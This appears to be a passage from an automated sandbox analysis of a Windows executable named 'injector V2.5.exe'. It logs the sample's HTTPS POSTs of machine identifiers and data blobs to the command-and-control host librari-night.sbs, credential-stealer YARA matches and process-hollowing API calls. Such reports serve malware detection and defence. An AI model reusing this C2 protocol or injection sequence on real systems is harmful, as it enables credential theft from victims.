                                                                                                                          2024-11-21 15:53:09 UTC2827OUTData Raw: a7 66 35 eb c7 4a 53 81 68 2f 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81
                                                                                                                          Data Ascii: f5JSh/d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE
                                                                                                                          2024-11-21 15:53:10 UTC998INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 21 Nov 2024 15:53:10 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Set-Cookie: PHPSESSID=pomfgh2gg50ma2mi1vevh5g1sm; expires=Mon, 17-Mar-2025 09:39:49 GMT; Max-Age=9999999; path=/
                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                          Pragma: no-cache
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3dxJsfRKRZCzzC6vv%2FSwQN4fZ1B18g%2BDmnyPh%2FOxeqay9w84YC5u9UdJiwDxLEk6EGxpi8bXSBxLxoqA7gJ2EDrPvZHcsy2%2F4bOPnZ52PaqIkuYdrEhdePuJuhers7FpsftFRQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8e61d9dc48e14294-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1814&sent=10&recv=22&lost=0&retrans=0&sent_bytes=2843&recv_bytes=19119&delivery_rate=1619523&cwnd=228&unsent_bytes=0&cid=8b95c23c29627e80&ts=893&x=0"
                                                                                                                          2024-11-21 15:53:10 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                          Data Ascii: eok 8.46.123.75
                                                                                                                          2024-11-21 15:53:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          4192.168.2.449737172.67.206.1724434928C:\Users\user\Desktop\injector V2.5.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-21 15:53:11 UTC277OUTPOST /api HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: multipart/form-data; boundary=LQFB2BLOIFOQ0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                          Content-Length: 8761
                                                                                                                          Host: librari-night.sbs
                                                                                                                          2024-11-21 15:53:11 UTC8761OUTData Raw: 2d 2d 4c 51 46 42 32 42 4c 4f 49 46 4f 51 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 35 44 45 41 44 44 34 43 33 45 34 42 35 42 37 34 41 46 46 35 41 44 45 43 39 45 36 42 44 37 37 0d 0a 2d 2d 4c 51 46 42 32 42 4c 4f 49 46 4f 51 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4c 51 46 42 32 42 4c 4f 49 46 4f 51 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 62 37 30 31 36 32 31 62 63 64 30 35 0d 0a 2d 2d 4c 51 46 42
                                                                                                                          Data Ascii: --LQFB2BLOIFOQ0Content-Disposition: form-data; name="hwid"F5DEADD4C3E4B5B74AFF5ADEC9E6BD77--LQFB2BLOIFOQ0Content-Disposition: form-data; name="pid"2--LQFB2BLOIFOQ0Content-Disposition: form-data; name="lid"HpOoIh--b701621bcd05--LQFB
                                                                                                                          2024-11-21 15:53:12 UTC1002INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 21 Nov 2024 15:53:12 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Set-Cookie: PHPSESSID=gg3ar4u7skjmn5sv5f6r7mvfrc; expires=Mon, 17-Mar-2025 09:39:51 GMT; Max-Age=9999999; path=/
                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                          Pragma: no-cache
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vtNZGDPk1s9%2BT7%2F6eFxa6CYSD%2Bj42T2IcRO5rc2pU3QZwE7Z4Eejpoa3Gc%2BxjWZeRPHbKUT6O4ZEvI6kSr7o7O%2BpIFeDY5%2BCBqUEwqB%2BOQQfvpaSzY0V8geiEB0VFqjL0raxog%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8e61d9ea6b920f71-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1723&sent=8&recv=14&lost=0&retrans=0&sent_bytes=2844&recv_bytes=9696&delivery_rate=1697674&cwnd=250&unsent_bytes=0&cid=035cfb7b07d6f631&ts=778&x=0"
                                                                                                                          2024-11-21 15:53:12 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                          Data Ascii: eok 8.46.123.75
                                                                                                                          2024-11-21 15:53:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          5192.168.2.449738172.67.206.1724434928C:\Users\user\Desktop\injector V2.5.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-21 15:53:14 UTC279OUTPOST /api HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: multipart/form-data; boundary=NPY4APXRH68ZC8
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                          Content-Length: 20420
                                                                                                                          Host: librari-night.sbs
                                                                                                                          2024-11-21 15:53:14 UTC15331OUTData Raw: 2d 2d 4e 50 59 34 41 50 58 52 48 36 38 5a 43 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 35 44 45 41 44 44 34 43 33 45 34 42 35 42 37 34 41 46 46 35 41 44 45 43 39 45 36 42 44 37 37 0d 0a 2d 2d 4e 50 59 34 41 50 58 52 48 36 38 5a 43 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4e 50 59 34 41 50 58 52 48 36 38 5a 43 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 62 37 30 31 36 32 31 62 63 64 30 35 0d 0a 2d 2d 4e
                                                                                                                          Data Ascii: --NPY4APXRH68ZC8Content-Disposition: form-data; name="hwid"F5DEADD4C3E4B5B74AFF5ADEC9E6BD77--NPY4APXRH68ZC8Content-Disposition: form-data; name="pid"3--NPY4APXRH68ZC8Content-Disposition: form-data; name="lid"HpOoIh--b701621bcd05--N
                                                                                                                          2024-11-21 15:53:14 UTC5089OUTData Raw: 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                          Data Ascii: M?lrQMn 64F6(X&7~`aO
                                                                                                                          2024-11-21 15:53:15 UTC996INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 21 Nov 2024 15:53:14 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Set-Cookie: PHPSESSID=m0cpahchdjsnb89a5oefgeeqhb; expires=Mon, 17-Mar-2025 09:39:53 GMT; Max-Age=9999999; path=/
                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                          Pragma: no-cache
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ca38Lydn4LCaHPzIk0CA8c%2FvoW9P5uk1EdKCqY%2FzPake62W8ckifmyRHgKuzzJqLcAwonlAauhqgwwVnOEPJw34zbns3PXxcy138GYdveB%2B4h82FcvT9OojV4WwmngASCr4kiA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8e61d9f8fa2c32ee-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1823&sent=15&recv=27&lost=0&retrans=0&sent_bytes=2844&recv_bytes=21379&delivery_rate=1554018&cwnd=241&unsent_bytes=0&cid=5fd0697d83f8e9b5&ts=925&x=0"
                                                                                                                          2024-11-21 15:53:15 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                          Data Ascii: eok 8.46.123.75
                                                                                                                          2024-11-21 15:53:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          6192.168.2.449740172.67.206.1724434928C:\Users\user\Desktop\injector V2.5.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-21 15:53:17 UTC281OUTPOST /api HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: multipart/form-data; boundary=GNHDNTX4N2FH4O1BS
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                          Content-Length: 1258
                                                                                                                          Host: librari-night.sbs
                                                                                                                          2024-11-21 15:53:17 UTC1258OUTData Raw: 2d 2d 47 4e 48 44 4e 54 58 34 4e 32 46 48 34 4f 31 42 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 35 44 45 41 44 44 34 43 33 45 34 42 35 42 37 34 41 46 46 35 41 44 45 43 39 45 36 42 44 37 37 0d 0a 2d 2d 47 4e 48 44 4e 54 58 34 4e 32 46 48 34 4f 31 42 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 47 4e 48 44 4e 54 58 34 4e 32 46 48 34 4f 31 42 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 62 37 30 31 36 32 31 62
                                                                                                                          Data Ascii: --GNHDNTX4N2FH4O1BSContent-Disposition: form-data; name="hwid"F5DEADD4C3E4B5B74AFF5ADEC9E6BD77--GNHDNTX4N2FH4O1BSContent-Disposition: form-data; name="pid"1--GNHDNTX4N2FH4O1BSContent-Disposition: form-data; name="lid"HpOoIh--b701621b
                                                                                                                          2024-11-21 15:53:17 UTC992INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 21 Nov 2024 15:53:17 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Set-Cookie: PHPSESSID=3aol4bddchgt1e61t6u9d6tlor; expires=Mon, 17-Mar-2025 09:39:56 GMT; Max-Age=9999999; path=/
                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                          Pragma: no-cache
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PpTjflgOpI9FgFb%2BAwVGvvygSOzq3x0vLyfEs7WwCTufudcF5Ycg10f9kpn%2FAWwsbMQ3uL%2BnCIEi7YM6vlg5EWA7BxqrJLxXSJu3thgwUNYEBaIhKwPZVXe9CSpYiOurEnIdoQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8e61da0b6e15c463-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2286&sent=7&recv=9&lost=0&retrans=1&sent_bytes=4228&recv_bytes=2175&delivery_rate=239207&cwnd=159&unsent_bytes=0&cid=8c34c9e41df77ab2&ts=774&x=0"
                                                                                                                          2024-11-21 15:53:17 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                          Data Ascii: eok 8.46.123.75
                                                                                                                          2024-11-21 15:53:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          7192.168.2.449744172.67.206.1724434928C:\Users\user\Desktop\injector V2.5.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-21 15:53:19 UTC282OUTPOST /api HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: multipart/form-data; boundary=6J2TM4YGL5Q2TFMP95
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                          Content-Length: 1136
                                                                                                                          Host: librari-night.sbs
                                                                                                                          2024-11-21 15:53:19 UTC1136OUTData Raw: 2d 2d 36 4a 32 54 4d 34 59 47 4c 35 51 32 54 46 4d 50 39 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 35 44 45 41 44 44 34 43 33 45 34 42 35 42 37 34 41 46 46 35 41 44 45 43 39 45 36 42 44 37 37 0d 0a 2d 2d 36 4a 32 54 4d 34 59 47 4c 35 51 32 54 46 4d 50 39 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 36 4a 32 54 4d 34 59 47 4c 35 51 32 54 46 4d 50 39 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 62 37 30 31 36
                                                                                                                          Data Ascii: --6J2TM4YGL5Q2TFMP95Content-Disposition: form-data; name="hwid"F5DEADD4C3E4B5B74AFF5ADEC9E6BD77--6J2TM4YGL5Q2TFMP95Content-Disposition: form-data; name="pid"1--6J2TM4YGL5Q2TFMP95Content-Disposition: form-data; name="lid"HpOoIh--b7016
                                                                                                                          2024-11-21 15:53:20 UTC998INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 21 Nov 2024 15:53:20 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Set-Cookie: PHPSESSID=vsoac0jjn9ehlbejqgdoheaohp; expires=Mon, 17-Mar-2025 09:39:58 GMT; Max-Age=9999999; path=/
                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                          Pragma: no-cache
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Fg%2FHIbj6dhC8zmm13%2FCWAluZtZlnrrz8uzCSrfkEcWNVSql2DBNgJoenBarKYm9W89MKEWYNvBYbpfxpr8me1z%2FpgOVHSgpKWj1Qb5LmlZQSrCMKU1e4OEV7m%2FP7eHilCskCbQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8e61da18ccca4297-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2477&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=2054&delivery_rate=1174105&cwnd=243&unsent_bytes=0&cid=d3eb6e8ed1c61741&ts=1522&x=0"
                                                                                                                          2024-11-21 15:53:20 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                          Data Ascii: eok 8.46.123.75
                                                                                                                          2024-11-21 15:53:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          8192.168.2.449746172.67.206.1724434928C:\Users\user\Desktop\injector V2.5.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-21 15:53:22 UTC266OUTPOST /api HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                          Content-Length: 121
                                                                                                                          Host: librari-night.sbs
                                                                                                                          2024-11-21 15:53:22 UTC121OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 62 37 30 31 36 32 31 62 63 64 30 35 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 26 68 77 69 64 3d 46 35 44 45 41 44 44 34 43 33 45 34 42 35 42 37 34 41 46 46 35 41 44 45 43 39 45 36 42 44 37 37
                                                                                                                          Data Ascii: act=get_message&ver=4.0&lid=HpOoIh--b701621bcd05&j=b9abc76ce53b6fc3a03566f8f764f5ea&hwid=F5DEADD4C3E4B5B74AFF5ADEC9E6BD77
                                                                                                                          2024-11-21 15:53:22 UTC993INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 21 Nov 2024 15:53:22 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Set-Cookie: PHPSESSID=2q3ekbf1fu5sk621gasl735jn5; expires=Mon, 17-Mar-2025 09:40:01 GMT; Max-Age=9999999; path=/
                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                          Pragma: no-cache
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RxVoMyXKj8bjHZ%2Bc4W5VCSGif3XJVGVTguIZaQaRFQQ9B8dGg7N%2FmEBL4e9zA24OXqs6RaJ8SC%2FO9XUntrFRc7TuSpw3RwfD2npbGUlobGhOydI7Oxvdbdsx4uW52PrylIMcZw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8e61da2b3dc4429e-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1762&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1023&delivery_rate=1616832&cwnd=192&unsent_bytes=0&cid=6501d746546b98d0&ts=753&x=0"
                                                                                                                          2024-11-21 15:53:22 UTC54INData Raw: 33 30 0d 0a 53 7a 30 30 4a 65 77 6d 31 54 73 64 6e 58 35 61 75 38 52 67 4a 6b 65 38 69 44 70 5a 5a 62 31 32 58 73 6f 63 55 38 43 6f 73 4e 4d 51 59 41 3d 3d 0d 0a
                                                                                                                          Data Ascii: 30Sz00Jewm1TsdnX5au8RgJke8iDpZZb12XsocU8CosNMQYA==
                                                                                                                          2024-11-21 15:53:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Click to jump to process

                                                                                                                          Click to jump to process

                                                                                                                          Click to dive into process behavior distribution

                                                                                                                          Click to jump to process

                                                                                                                          Target ID:0
                                                                                                                          Start time:10:52:55
                                                                                                                          Start date:21/11/2024
                                                                                                                          Path:C:\Users\user\Desktop\injector V2.5.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Desktop\injector V2.5.exe"
                                                                                                                          Imagebase:0xb20000
                                                                                                                          File size:587'904 bytes
                                                                                                                          MD5 hash:96F89E1CB2A8789ACEE8720D872B4CC5
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                          Target ID:1
                                                                                                                          Start time:10:52:55
                                                                                                                          Start date:21/11/2024
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                          File size:862'208 bytes
                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:2
                                                                                                                          Start time:10:52:58
                                                                                                                          Start date:21/11/2024
                                                                                                                          Path:C:\Users\user\Desktop\injector V2.5.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Desktop\injector V2.5.exe"
                                                                                                                          Imagebase:0xb20000
                                                                                                                          File size:587'904 bytes
                                                                                                                          MD5 hash:96F89E1CB2A8789ACEE8720D872B4CC5
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1799214621.00000000033D3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1849649478.00000000033E5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                          Reset < >

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:2.1%
                                                                                                                            Dynamic/Decrypted Code Coverage:0.7%
                                                                                                                            Signature Coverage:4.2%
                                                                                                                            Total number of Nodes:1164
                                                                                                                            Total number of Limit Nodes:20
                                                                                                                            execution_graph 16312 b2a0b0 16313 b2a0f0 16312->16313 16314 b2a14c ExitProcess 16313->16314 16315 b2a126 ExitProcess 16313->16315 17491 b48e90 17494 b49d60 17491->17494 17493 b48ea5 17495 b49d74 17494->17495 17496 b49d6d 17494->17496 17495->17493 17498 b4bc74 17496->17498 17499 b4dc4b ___free_lconv_mon 14 API calls 17498->17499 17500 b4bc8c 17499->17500 17500->17495 17437 b5d18d 17442 b5d1c3 17437->17442 17438 b5d310 GetPEB 17439 b5d322 CreateProcessW VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 17438->17439 17440 b5d3c9 WriteProcessMemory 17439->17440 17439->17442 17441 b5d40e 17440->17441 17443 b5d450 WriteProcessMemory Wow64SetThreadContext ResumeThread 17441->17443 17444 b5d413 WriteProcessMemory 17441->17444 17442->17438 17442->17439 17444->17441 17544 b3c2e3 17545 b3c788 17544->17545 17546 b3c2ee 17544->17546 17547 b3d463 17545->17547 17548 b3c79e 17545->17548 17559 b3c7b4 17545->17559 17549 b3d4a0 5 API calls 17546->17549 17557 b3c107 17546->17557 17554 b3d480 17547->17554 17547->17557 17575 b3dd00 17547->17575 17560 b3d4a0 17548->17560 17549->17557 17556 b48dd1 TranslatorGuardHandler 5 API calls 17554->17556 17558 b3d48a 17556->17558 17559->17557 17571 b47840 17559->17571 17565 b3d4e6 17560->17565 17561 b3da54 17563 b48dd1 TranslatorGuardHandler 5 API calls 17561->17563 17562 b3e730 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17562->17565 17564 b3c7a5 17563->17564 17567 b3f340 17564->17567 17565->17561 17565->17562 17566 b3ea30 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17565->17566 17566->17565 17570 b3f3af 17567->17570 17568 b48dd1 TranslatorGuardHandler 5 API calls 17569 b41304 17568->17569 17569->17559 